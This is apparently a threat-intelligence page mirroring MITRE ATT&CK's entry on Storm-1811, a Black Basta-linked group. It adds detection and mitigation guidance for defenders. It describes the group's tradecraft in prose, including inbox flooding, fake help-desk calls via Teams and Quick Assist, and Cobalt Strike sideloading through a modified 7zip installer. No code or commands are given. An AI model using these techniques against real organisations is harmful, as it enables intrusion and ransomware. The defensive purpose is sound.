G1046: Storm-1811
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.[1][2][3][4]
Analyst context for executives and security teams
Storm-1811 matters because ATT&CK describes it as a financially motivated group linked to Black Basta ransomware deployment and notable for social engineering that can look like normal help desk activity: inbox flooding followed by a fake support interaction and use of remote assistance tooling. For leaders, the key issue is not just phishing prevention; it is whether employees, service desks, identity teams, and the SOC can recognize and contain a support-themed intrusion before it becomes remote control, lateral movement, data staging/exfiltration, or ransomware deployment.
Executive priority
Prioritize validation of help desk procedures, remote support tool governance, privileged access monitoring, and ransomware response readiness. This behavior can pressure business continuity because the supplied ATT&CK relationships include Black Basta ransomware, Quick Assist, remote desktop software, SMB/SSH lateral movement, data staging, exfiltration, and common administrative tools such as PsExec, BITSAdmin, Impacket, PowerShell, and Windows command shell. Executives should ask: who is allowed to initiate remote assistance, how users verify support requests, whether remote admin tools are inventoried and logged, and whether IR playbooks connect social engineering reports to endpoint, identity, and network containment actions.
Technical view
ATT&CK provides no official detection text for Storm-1811, so defenders should build coverage from the documented relationships. Validate detections for unusual remote assistance sessions, especially Quick Assist or other remote desktop software following user-reported email flooding or help desk contact. On Windows, review telemetry for PowerShell, cmd, PsExec, BITSAdmin, SMB admin share activity, domain account discovery, user discovery, local data staging, encoded/encrypted files, deobfuscation, masquerading, and tool transfer. Where ESXi, Linux, or macOS are in scope, validate SSH activity, remote access, staging, and exfiltration monitoring aligned to the related techniques. IR teams should treat confirmed unauthorized remote support sessions as potential hands-on-keyboard access and rapidly scope identity use, lateral movement, staged data, and ransomware precursors.
Likely telemetry
- User reports and mail telemetry showing abnormal inbox flooding or high-volume non-malicious spam preceding help desk contact
- Help desk tickets, chat/phone records, and user verification logs related to remote assistance requests
- Endpoint process creation for PowerShell, cmd, PsExec, BITSAdmin, remote support tools, and renamed or oddly located executables
- Quick Assist and other remote desktop software execution, installation, session, or network connection logs where available
- Windows authentication, SMB/admin share access, service creation, and lateral movement evidence
Detection direction
- Correlate social signals with technical events: email bombing plus remote assistance use plus new process execution is more meaningful than any single event alone.
- Baseline legitimate Quick Assist and remote desktop software use; alert on unexpected initiators, unusual timing, first-time use, or sessions involving privileged users or sensitive systems.
- Tune administrative-tool detections carefully because PsExec, BITSAdmin, PowerShell, cmd, Impacket-like behavior, SMB, and SSH can be legitimate; prioritize context such as source host, account privilege, destination criticality, and sequence of activity.
- Look for post-access chains: remote support session followed by discovery, tool transfer, masquerading, encoded files, data staging, exfiltration, or lateral movement.
- Validate visibility gaps around help desk workflows, unmanaged remote support tools, ESXi hosts, SSH-enabled systems, and encrypted outbound traffic that is not part of approved business operations.
Mitigation priorities
- Harden support workflows first: require strong user verification, prohibit unsolicited remote assistance, and train users to report inbox flooding and unexpected help desk contact.
- Govern remote assistance and remote desktop software: define approved tools, restrict who may initiate sessions, and log usage centrally where feasible.
- Strengthen identity controls for privileged and support accounts, including least privilege and review of accounts that mimic legitimate names or resources.
- Improve endpoint and server monitoring for administrative utilities, scripting shells, tool transfer, masquerading, staging, and lateral movement over SMB or SSH.
- Prepare ransomware response around the Black Basta relationship: confirm backup resilience, segmentation, critical asset isolation, and containment procedures for Windows and ESXi assets where present.
Analyst notes and limits
The supplied ATT&CK object identifies Storm-1811 as financially motivated and linked to Black Basta ransomware deployment, with social engineering involving email inbox flooding and fake help desk interaction. The strongest defensive value comes from connecting human-process telemetry with endpoint, identity, remote access, and network evidence. Relationship context materially expands what teams should validate, especially Quick Assist, remote desktop software, administrative utilities, lateral movement, discovery, staging, exfiltration, and ransomware-related readiness.
Platforms and tactics are not specified on the Storm-1811 group object, and official detection content is not provided. Platform references in this take come only from related software and technique objects, not from a group-level platform declaration. Local validation is required to determine whether Quick Assist, remote desktop software, SMB, SSH, ESXi, Linux, macOS, or specific administrative tools are present and monitored in the reader’s environment.
Storm-1811
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.[1][2][3][4]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1585.003 | Cloud Accounts Sub-technique | Storm-1811 has created malicious accounts to enable activity via Microsoft Teams, typically spoofing various IT support and helpdesk themes.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Storm-1811 has locally staged captured credentials for subsequent manual exfiltration.Citationrapid7-email-bombing |
| Enterprise | T1667 | Email Bombing | Storm-1811 has deployed large volumes of non-malicious email spam to victims in order to prompt follow-on interactions with the threat actor posing as IT support or helpdesk to resolve the problem.Citationrapid7-email-bombingCitationRedCanary Storm-1811 2024 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Storm-1811 has created Windows Registry Run keys that execute various batch scripts to establish persistence on victim devices.Citationrapid7-email-bombing |
| Enterprise | T1583.001 | Domains Sub-technique | Storm-1811 has created domains for use with RMM tools.Citationrapid7-email-bombing |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Storm-1811 has disguised Cobalt Strike installers as a malicious DLL masquerading as part of a legitimate 7zip installation package.Citationrapid7-email-bombing |
| Enterprise | T1588.002 | Tool Sub-technique | Storm-1811 acquired various legitimate and malicious tools, such as RMM software and commodity malware packages, for operations.CitationMicrosoft Storm-1811 2024Citationrapid7-email-bombing |
| Enterprise | T1219.002 | Remote Desktop Software Sub-technique | Storm-1811 has abused multiple types of legitimate remote access software and tools, such as ScreenConnect, NetSupport Manager, and AnyDesk.CitationMicrosoft Storm-1811 2024Citationrapid7-email-bombing |
| Enterprise | T1059.001 | PowerShell Sub-technique | Storm-1811 has used PowerShell for multiple purposes, such as using PowerShell scripts executing in an infinite loop to create an SSH connection to a command and control server.Citationrapid7-email-bombing |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Storm-1811 has used multiple batch scripts during initial access and subsequent actions on victim machines.CitationMicrosoft Storm-1811 2024Citationrapid7-email-bombing |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Storm-1811 has distributed password-protected archives such as ZIP files during intrusions.Citationrapid7-email-bombing |
| Enterprise | T1036.010 | Masquerade Account Name Sub-technique | Storm-1811 has created Microsoft Teams accounts that spoof IT support and helpdesk members for use in application and voice phishing.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1056 | Input Capture | Storm-1811 has used a PowerShell script to capture user credentials after prompting a user to authenticate to run a malicious script masquerading as a legitimate update item.Citationrapid7-email-bombing |
| Enterprise | T1574.001 | DLL Sub-technique | Storm-1811 has deployed a malicious DLL (7z.DLL) that is sideloaded by a modified, legitimate installer (7zG.exe) when that installer is executed with an additional command line parameter of `b` at runtime to load a Cobalt Strike beacon payload.Citationrapid7-email-bombing |
| Enterprise | T1204.002 | Malicious File Sub-technique | Storm-1811 has prompted users to execute downloaded software and payloads as the result of social engineering activity.CitationMicrosoft Storm-1811 2024Citationrapid7-email-bombingCitationRedCanary Storm-1811 2024 |
| Enterprise | T1566.004 | Spearphishing Voice Sub-technique | Storm-1811 has initiated voice calls with victims posing as IT support to prompt users to download and execute scripts and other tools for initial access.CitationMicrosoft Storm-1811 2024Citationrapid7-email-bombingCitationRedCanary Storm-1811 2024 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Storm-1811 XOR encodes a Cobalt Strike installation payload in a DLL file that is decoded with a hardcoded key when called by a legitimate 7zip installation process.Citationrapid7-email-bombing |
| Enterprise | T1684.001 | Impersonation Sub-technique | Storm-1811 impersonates help desk and IT support personnel for phishing and social engineering purposes during initial access to victim environments.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1105 | Ingress Tool Transfer | Storm-1811 has used scripted `cURL` commands, BITSAdmin, and other mechanisms to retrieve follow-on batch scripts and tools for execution on victim devices.CitationMicrosoft Storm-1811 2024Citationrapid7-email-bombingCitationRedCanary June Insights 2024 |
| Enterprise | T1570 | Lateral Tool Transfer | Storm-1811 has used the Impacket toolset to move and remotely execute payloads to other hosts in victim networks.Citationrapid7-email-bombing |
| Enterprise | T1021.004 | SSH Sub-technique | Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1486 | Data Encrypted for Impact | Storm-1811 is a financially-motivated entity linked to the deployment of Black Basta ransomware in victim environments.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1036 | Masquerading | Storm-1811 has prompted users to download and execute batch scripts that masquerade as legitimate update files during initial access and social engineering operations.Citationrapid7-email-bombing |
| Enterprise | T1482 | Domain Trust Discovery | Storm-1811 has enumerated domain accounts and access during intrusions.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | Storm-1811 has used Microsoft Teams to send messages and initiate voice calls to victims posing as IT support personnel.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | Storm-1811 has distributed malicious links to victims that redirect to EvilProxy-based phishing sites to harvest credentials.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1087.002 | Domain Account Sub-technique | Storm-1811 has performed domain account enumeration during intrusions.CitationMicrosoft Storm-1811 2024 |
| Enterprise | T1033 | System Owner/User Discovery | Storm-1811 has used `whoami.exe` to determine if the active user on a compromised system is an administrator.Citationrapid7-email-bombing |
| Enterprise | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Sub-technique | Storm-1811 has exfiltrated captured user credentials via Secure Copy Protocol (SCP).Citationrapid7-email-bombing |
| Enterprise | T1222.001 | Windows Permissions Sub-technique | Storm-1811 has used `cacls.exe` via batch script to modify file and directory permissions in victim environments.Citationrapid7-email-bombing |
| Enterprise | T1021.002 | SMB/Windows Admin Shares Sub-technique | Storm-1811 has attempted to move laterally in victim environments via SMB using Impacket.Citationrapid7-email-bombing |
Groups, software, and campaigns
S1070: Black Basta
Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. Black Basta operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the Black Basta RaaS operators could include current or former members of the Conti group.[1][2][3][4][5][6]
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S1209: Quick Assist
Quick Assist is a remote assistance tool primarily for Microsoft Windows, although a macOS version also exists. Quick Assist allows for remote screen sharing and, with end user approval, remote control and command execution on the enabling device.[1][2]
S0190: BITSAdmin
S0029: PsExec
S0357: Impacket
S0650: QakBot
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 29fa4e2a8110… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft Storm-1811 2024
Microsoft Threat Intelligence. (2024, May 15). Threat actors misusing Quick Assist in social engineering attacks leading to ransomware. Retrieved March 14, 2025.
Open source URL -
[2]
rapid7-email-bombing
Tyler McGraw, Thomas Elkins, and Evan McCann. (2024, May 10). Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators. Retrieved January 31, 2025.
Open source URL -
[3]
RedCanary Storm-1811 2024
Red Canary Intelligence. (2024, December 2). Storm-1811 exploits RMM tools to drop Black Basta ransomware. Retrieved March 14, 2025.
Open source URL -
[4]
RedCanary June Insights 2024
The Red Canary Team. (2024, June 20). Intelligence Insights: June 2024. Retrieved March 14, 2025.
Open source URL -
[5]
mitre-attack G1046Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.